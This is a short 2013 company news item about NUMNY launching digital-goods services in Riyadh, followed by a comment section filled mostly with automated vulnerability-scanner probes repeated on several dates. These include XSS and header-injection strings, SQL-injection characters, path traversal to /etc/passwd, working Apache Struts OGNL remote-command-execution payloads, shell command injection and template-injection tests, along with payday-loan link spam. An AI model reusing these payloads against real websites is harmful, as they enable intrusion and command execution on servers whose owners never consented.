NUMNY launched its service offerings starting in Riyadh.

Monday, September 16, 2013

NUMNY launched its service offerings starting in Riyadh with plans to expand its operations in the Kingdom of Saudi Arabia and thru the Middle East.

NUMNY Advances E-commerce using state of the art secure digital goods distribution and delivery platform; offering hundreds of instant online delivery services such as Telecommunications charge cards, International top-ups, Gaming cards, and much more.

NUMNY is partnering with Pride Bases Technology Company as its exclusive master distributer in the kingdom of Saudi Arabia.

Info about the offered products and services.
Comments
Leave your comment
Comments
1
Created on: 4/3/2018 9:20 AM
"><qss>
1
Created on: 4/3/2018 9:23 AM

"'><qss>
1
Created on: 4/3/2018 9:26 AM
z--><qss>
1
Created on: 4/3/2018 9:30 AM
"'><qss `;!--=&{()}>
1
Created on: 4/3/2018 9:33 AM
<script>_q=random(X3064312896Y2Z)</script>
1
Created on: 4/3/2018 9:36 AM

<script>_q_q=random()</script>
1
Created on: 4/3/2018 9:39 AM
<script src=//localhost/j>
1
Created on: 4/3/2018 9:43 AM
<script =">" SRC=//localhost/j>
1
Created on: 4/3/2018 9:46 AM
<SCRIPT/QSS SRC=//localhost/j>
1
Created on: 4/3/2018 9:49 AM
"'><<SCRIPT a=2>qss=7;//<</SCRIPT>
1
Created on: 4/3/2018 9:52 AM
<IMG SRC=javascript:qss=7>
1
Created on: 4/3/2018 9:55 AM
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss=7">
1
Created on: 4/3/2018 9:59 AM

"><DIV STYLE="width:expression(qss=7)">
1
Created on: 4/3/2018 10:02 AM
<STYLE type="text/css" a=3>BODY{background:url("javascript:qss=7")}</STYLE>
1
Created on: 4/3/2018 10:05 AM
<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>
1
Created on: 4/3/2018 10:09 AM
"'><qss a=X3064312896Y2Z>
1
Created on: 4/3/2018 10:12 AM
' onEvent=X3064312896Y2Z
1
Created on: 4/3/2018 10:16 AM
" onEvent=X3064312896Y2Z
1
Created on: 4/3/2018 10:20 AM
<

script a=4>qss=7<

/script>
1
Created on: 4/3/2018 10:23 AM
%3cscript z%3e_q(y)%3c/script%3e
1
Created on: 4/3/2018 10:27 AM
<script src=http://localhost/j
1
Created on: 4/3/2018 10:30 AM
q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
1
Created on: 4/3/2018 10:33 AM

'
1
Created on: 4/3/2018 10:37 AM
;--
1
Created on: 4/3/2018 10:41 AM
#
1
Created on: 4/3/2018 10:44 AM
/*
1
Created on: 4/3/2018 10:48 AM
``
1
Created on: 4/3/2018 10:52 AM
,
1
Created on: 4/3/2018 10:55 AM
(
1
Created on: 4/3/2018 10:59 AM
1e309
1
Created on: 4/3/2018 11:03 AM
1
Created on: 4/3/2018 11:06 AM
/../../../../../../../etc/passwd
1
Created on: 4/3/2018 11:10 AM
/../../../../../../../etc/passwd
1
Created on: 4/3/2018 11:14 AM
../../../../../../../etc/passwd
1
Created on: 4/3/2018 11:18 AM
//..//..//..//..//..//..//..//etc/passwd
1
Created on: 4/3/2018 11:21 AM
//....//....//....//....//....//....//....//etc/passwd
1
Created on: 4/3/2018 11:25 AM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 4/3/2018 11:29 AM
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 4/3/2018 11:33 AM
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 4/3/2018 11:38 AM
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
Created on: 4/3/2018 11:42 AM
a(){}phpinfo(); function a
1
Created on: 4/3/2018 11:46 AM
|netstat -an
1
Created on: 4/3/2018 11:50 AM
http://rfitest/
1
Created on: 4/3/2018 11:53 AM
javascript:qxss(X3064312896Y2Z);
1
Created on: 4/3/2018 11:57 AM
";(function(){qxss});//
1
Created on: 4/3/2018 12:01 PM
");(function(){qxss});//
1
Created on: 4/3/2018 12:04 PM
';(function(){qxss});//
1
Created on: 4/3/2018 12:08 PM
9;(function(){qxss});//
1
Created on: 4/3/2018 12:12 PM
9
;(function(){qxss});//
1
Created on: 4/3/2018 12:16 PM
*/;(function(){qxss});/*
1
Created on: 4/3/2018 12:23 PM
ping -c2 -i90 localhost
1
Created on: 5/3/2018 8:51 AM
"><qss>
1
Created on: 5/3/2018 8:54 AM

"'><qss>
1
Created on: 5/3/2018 8:57 AM
z--><qss>
1
Created on: 5/3/2018 9:00 AM
"'><qss `;!--=&{()}>
1
Created on: 5/3/2018 9:03 AM
<script>_q=random(X162182144Y2Z)</script>
1
Created on: 5/3/2018 9:06 AM

<script>_q_q=random()</script>
1
Created on: 5/3/2018 9:08 AM
<script src=//localhost/j>
1
Created on: 5/3/2018 9:11 AM
<script =">" SRC=//localhost/j>
1
Created on: 5/3/2018 9:14 AM
<SCRIPT/QSS SRC=//localhost/j>
1
Created on: 5/3/2018 9:17 AM
"'><<SCRIPT a=2>qss=7;//<</SCRIPT>
1
Created on: 5/3/2018 9:20 AM
<IMG SRC=javascript:qss=7>
1
Created on: 5/3/2018 9:23 AM
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss=7">
1
Created on: 5/3/2018 9:26 AM

"><DIV STYLE="width:expression(qss=7)">
1
Created on: 5/3/2018 9:29 AM
<STYLE type="text/css" a=3>BODY{background:url("javascript:qss=7")}</STYLE>
1
Created on: 5/3/2018 9:32 AM
<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>
1
Created on: 5/3/2018 9:35 AM
"'><qss a=X162182144Y2Z>
1
Created on: 5/3/2018 9:39 AM
' onEvent=X162182144Y2Z
1
Created on: 5/3/2018 9:42 AM
" onEvent=X162182144Y2Z
1
Created on: 5/3/2018 9:46 AM
<

script a=4>qss=7<

/script>
1
Created on: 5/3/2018 9:49 AM
%3cscript z%3e_q(y)%3c/script%3e
1
Created on: 5/3/2018 9:52 AM
<script src=http://localhost/j
1
Created on: 5/3/2018 9:55 AM
q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
1
Created on: 5/3/2018 9:58 AM

'
1
Created on: 5/3/2018 10:01 AM
;--
1
Created on: 5/3/2018 10:04 AM
#
1
Created on: 5/3/2018 10:07 AM
/*
1
Created on: 5/3/2018 10:10 AM
``
1
Created on: 5/3/2018 10:14 AM
,
1
Created on: 5/3/2018 10:17 AM
(
1
Created on: 5/3/2018 10:20 AM
1e309
1
Created on: 5/3/2018 10:23 AM
1
Created on: 5/3/2018 10:27 AM
/../../../../../../../etc/passwd
1
Created on: 5/3/2018 10:30 AM
/../../../../../../../etc/passwd
1
Created on: 5/3/2018 10:33 AM
../../../../../../../etc/passwd
1
Created on: 5/3/2018 10:36 AM
//..//..//..//..//..//..//..//etc/passwd
1
Created on: 5/3/2018 10:40 AM
//....//....//....//....//....//....//....//etc/passwd
1
Created on: 5/3/2018 10:43 AM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 5/3/2018 10:46 AM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 5/3/2018 10:49 AM
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 5/3/2018 10:53 AM
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 5/3/2018 10:56 AM
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
Created on: 5/3/2018 11:00 AM
a(){}phpinfo(); function a
1
Created on: 5/3/2018 11:03 AM
|netstat -an
1
Created on: 5/3/2018 11:06 AM
http://rfitest/
1
Created on: 5/3/2018 11:10 AM
javascript:qxss(X162182144Y2Z);
1
Created on: 5/3/2018 11:13 AM
";(function(){qxss});//
1
Created on: 5/3/2018 11:16 AM
");(function(){qxss});//
1
Created on: 5/3/2018 11:20 AM
';(function(){qxss});//
1
Created on: 5/3/2018 11:23 AM
9;(function(){qxss});//
1
Created on: 5/3/2018 11:26 AM
9
;(function(){qxss});//
1
Created on: 5/3/2018 11:30 AM
*/;(function(){qxss});/*
1
Created on: 5/3/2018 11:38 AM
aaaa&ping -n 91 localhost&
1
Created on: 5/3/2018 11:41 AM
ping -c2 -i90 localhost
1
Created on: 5/3/2018 11:44 AM
|ping -c2 -i90 localhost
1
Created on: 5/3/2018 11:48 AM
|ping -c2 -i90 localhost|
1
Created on: 5/3/2018 11:52 AM

(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
Created on: 6/3/2018 9:22 AM
"><qss>
1
Created on: 6/3/2018 9:23 AM

"'><qss>
1
Created on: 6/3/2018 9:25 AM
z--><qss>
1
Created on: 6/3/2018 9:27 AM
"'><qss `;!--=&{()}>
1
Created on: 6/3/2018 9:29 AM
<script>_q=random(X3066094692Y2Z)</script>
1
Created on: 6/3/2018 9:30 AM

<script>_q_q=random()</script>
1
Created on: 6/3/2018 9:32 AM
<script src=//localhost/j>
1
Created on: 6/3/2018 9:34 AM
<script =">" SRC=//localhost/j>
1
Created on: 6/3/2018 9:36 AM
<SCRIPT/QSS SRC=//localhost/j>
1
Created on: 6/3/2018 9:37 AM
"'><<SCRIPT a=2>qss=7;//<</SCRIPT>
1
Created on: 6/3/2018 9:39 AM
<IMG SRC=javascript:qss=7>
1
Created on: 6/3/2018 9:41 AM
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss=7">
1
Created on: 6/3/2018 9:42 AM

"><DIV STYLE="width:expression(qss=7)">
1
Created on: 6/3/2018 9:44 AM
<STYLE type="text/css" a=3>BODY{background:url("javascript:qss=7")}</STYLE>
1
Created on: 6/3/2018 9:46 AM
<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>
1
Created on: 6/3/2018 9:48 AM
"'><qss a=X3066094692Y2Z>
1
Created on: 6/3/2018 9:49 AM
' onEvent=X3066094692Y2Z
1
Created on: 6/3/2018 9:51 AM
" onEvent=X3066094692Y2Z
1
Created on: 6/3/2018 9:53 AM
<

script a=4>qss=7<

/script>
1
Created on: 6/3/2018 9:55 AM
%3cscript z%3e_q(y)%3c/script%3e
1
Created on: 6/3/2018 9:57 AM
<script src=http://localhost/j
1
Created on: 6/3/2018 9:59 AM
q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
1
Created on: 6/3/2018 10:00 AM
q
Qualys_resp_hdr_injection: Vulnerable
1
Created on: 6/3/2018 10:02 AM
q
Qualys_resp_hdr_injection: Vulnerable
1
Created on: 6/3/2018 10:04 AM

'
1
Created on: 6/3/2018 10:06 AM
;--
1
Created on: 6/3/2018 10:07 AM
#
1
Created on: 6/3/2018 10:10 AM
/*
1
Created on: 6/3/2018 10:11 AM
``
1
Created on: 6/3/2018 10:13 AM
,
1
Created on: 6/3/2018 10:15 AM
(
1
Created on: 6/3/2018 10:17 AM
1e309
1
Created on: 6/3/2018 10:19 AM
1
Created on: 6/3/2018 10:21 AM
/../../../../../../../etc/passwd
1
Created on: 6/3/2018 10:23 AM
/../../../../../../../etc/passwd
1
Created on: 6/3/2018 10:24 AM
../../../../../../../etc/passwd
1
Created on: 6/3/2018 10:26 AM
//..//..//..//..//..//..//..//etc/passwd
1
Created on: 6/3/2018 10:28 AM
//....//....//....//....//....//....//....//etc/passwd
1
Created on: 6/3/2018 10:30 AM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 6/3/2018 10:32 AM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 6/3/2018 10:34 AM
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 6/3/2018 10:36 AM
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 6/3/2018 10:38 AM
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
Created on: 6/3/2018 10:40 AM
a(){}phpinfo(); function a
1
Created on: 6/3/2018 10:42 AM
|netstat -an
1
Created on: 6/3/2018 10:44 AM
http://rfitest/
1
Created on: 6/3/2018 10:45 AM
javascript:qxss(X3066094692Y2Z);
1
Created on: 6/3/2018 10:47 AM
";(function(){qxss});//
1
Created on: 6/3/2018 10:49 AM
");(function(){qxss});//
1
Created on: 6/3/2018 10:51 AM
';(function(){qxss});//
1
Created on: 6/3/2018 10:53 AM
9;(function(){qxss});//
1
Created on: 6/3/2018 10:55 AM
9
;(function(){qxss});//
1
Created on: 6/3/2018 10:57 AM
*/;(function(){qxss});/*
1
Created on: 6/3/2018 10:59 AM

|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1
Created on: 6/3/2018 11:01 AM
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
Created on: 6/3/2018 11:03 AM
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/}
/*

#set($value=23.0231*213.759)
$value
*/
1
Created on: 6/3/2018 11:05 AM
(23.0231*213.759)
1
Created on: 6/3/2018 11:09 AM
aaaa&ping -n 91 localhost&
1
Created on: 6/3/2018 11:11 AM
ping -c2 -i90 localhost
1
Created on: 6/3/2018 11:13 AM
|ping -c2 -i90 localhost
1
Created on: 6/3/2018 11:15 AM
|ping -c2 -i90 localhost|
1
Created on: 6/3/2018 11:17 AM

(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
nwbaqogo
Created on: 6/15/2018 1:16 AM
lender <a href="http://paydayloans.cars">quick credit</a> payday lender [url=http://paydayloans.cars]lending com[/url]
cfgzodtt
Created on: 6/15/2018 6:33 AM
loan lenders <a href="http://paydayloans.cars">lender</a> loan lenders [url=http://paydayloans.cars]direct lender installment loans[/url]
gwjicbuk
Created on: 6/15/2018 8:07 PM
loan lenders <a href="http://paydayloans.cars">lender</a> loan lenders [url=http://paydayloans.cars]direct lender installment loans[/url]
yolhyres
Created on: 6/16/2018 9:38 PM
installment loans online <a href="http://loansonline.cars">payday loan online</a> online loan [url=http://loansonline.cars]loan online[/url]
llausgvi
Created on: 6/19/2018 7:46 AM
fast online payday <a href="http://paydayloans.cars">direct lender payday loans</a> loan lenders [url=http://paydayloans.cars]lender[/url]
fionqywu
Created on: 6/21/2018 8:27 AM
online loan <a href="http://loansonline.cars">online loan</a> online loans [url=http://loansonline.cars]cash loans online[/url]
flhysxjf
Created on: 6/21/2018 3:53 PM
payday loan direct lender <a href="http://paydayloans.cars">fast and easy payday loans</a> money lender [url=http://paydayloans.cars]where to get a loan[/url]
qfqejibi
Created on: 6/22/2018 6:24 AM
lender <a href="http://paydayloans.cars">payday loans without credit check</a> lender [url=http://paydayloans.cars]payday lender[/url]
umzfwkts
Created on: 6/25/2018 8:07 PM
payday loan installment <a href="http://paydayloans.cars">payday lender</a> payday lender [url=http://paydayloans.cars]lender[/url]
dalitobu
Created on: 6/26/2018 1:49 AM
payday loans direct lender <a href="http://paydayloans.cars">low interest rate personal loans</a> 100 payday loan [url=http://paydayloans.cars]loan apply[/url]
gxwnspww
Created on: 6/27/2018 3:20 PM
online loan application <a href="http://loansonline.cars">loan online</a> loan online [url=http://loansonline.cars]installment loans online[/url]
Dhhjj@hotmail.com
Created on: 7/10/2018 12:49 AM
Zxc123zxc
1
Created on: 8/3/2018 9:19 AM
"><qss>
1
Created on: 8/3/2018 9:20 AM

"'><qss>
1
Created on: 8/3/2018 9:22 AM
z--><qss>
1
Created on: 8/3/2018 9:24 AM
"'><qss `;!--=&{()}>
1
Created on: 8/3/2018 9:25 AM
<script>_q=random(X3070560628Y2Z)</script>
1
Created on: 8/3/2018 9:27 AM

<script>_q_q=random()</script>
1
Created on: 8/3/2018 9:29 AM
<script src=//localhost/j>
1
Created on: 8/3/2018 9:31 AM
<script =">" SRC=//localhost/j>
1
Created on: 8/3/2018 9:32 AM
<SCRIPT/QSS SRC=//localhost/j>
1
Created on: 8/3/2018 9:34 AM
"'><<SCRIPT a=2>qss=7;//<</SCRIPT>
1
Created on: 8/3/2018 9:36 AM
<IMG SRC=javascript:qss=7>
1
Created on: 8/3/2018 9:37 AM
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss=7">
1
Created on: 8/3/2018 9:39 AM

"><DIV STYLE="width:expression(qss=7)">
1
Created on: 8/3/2018 9:41 AM
<STYLE type="text/css" a=3>BODY{background:url("javascript:qss=7")}</STYLE>
1
Created on: 8/3/2018 9:42 AM
<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>
1
Created on: 8/3/2018 9:44 AM
"'><qss a=X3070560628Y2Z>
1
Created on: 8/3/2018 9:46 AM
' onEvent=X3070560628Y2Z
1
Created on: 8/3/2018 9:48 AM
" onEvent=X3070560628Y2Z
1
Created on: 8/3/2018 9:49 AM
<

script a=4>qss=7<

/script>
1
Created on: 8/3/2018 9:51 AM
%3cscript z%3e_q(y)%3c/script%3e
1
Created on: 8/3/2018 9:53 AM
<script src=http://localhost/j
1
Created on: 8/3/2018 9:55 AM
q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
1
Created on: 8/3/2018 9:56 AM
q
Qualys_resp_hdr_injection: Vulnerable
1
Created on: 8/3/2018 9:58 AM
q
Qualys_resp_hdr_injection: Vulnerable
1
Created on: 8/3/2018 10:00 AM

'
1
Created on: 8/3/2018 10:01 AM
;--
1
Created on: 8/3/2018 10:03 AM
#
1
Created on: 8/3/2018 10:05 AM
/*
1
Created on: 8/3/2018 10:07 AM
``
1
Created on: 8/3/2018 10:09 AM
,
1
Created on: 8/3/2018 10:11 AM
(
1
Created on: 8/3/2018 10:13 AM
1e309
1
Created on: 8/3/2018 10:14 AM
1
Created on: 8/3/2018 10:16 AM
/../../../../../../../etc/passwd
1
Created on: 8/3/2018 10:18 AM
/../../../../../../../etc/passwd
1
Created on: 8/3/2018 10:20 AM
../../../../../../../etc/passwd
1
Created on: 8/3/2018 10:22 AM
//..//..//..//..//..//..//..//etc/passwd
1
Created on: 8/3/2018 10:24 AM
//....//....//....//....//....//....//....//etc/passwd
1
Created on: 8/3/2018 10:26 AM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 8/3/2018 10:27 AM
../../../../../../../Windows/System32/drivers/etc/hosts
1
Created on: 8/3/2018 10:29 AM
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 8/3/2018 10:31 AM
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
Created on: 8/3/2018 10:33 AM
